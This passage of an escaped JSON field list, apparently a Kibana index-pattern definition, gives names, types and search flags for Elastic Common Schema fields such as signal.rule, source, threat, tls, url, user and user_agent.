true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"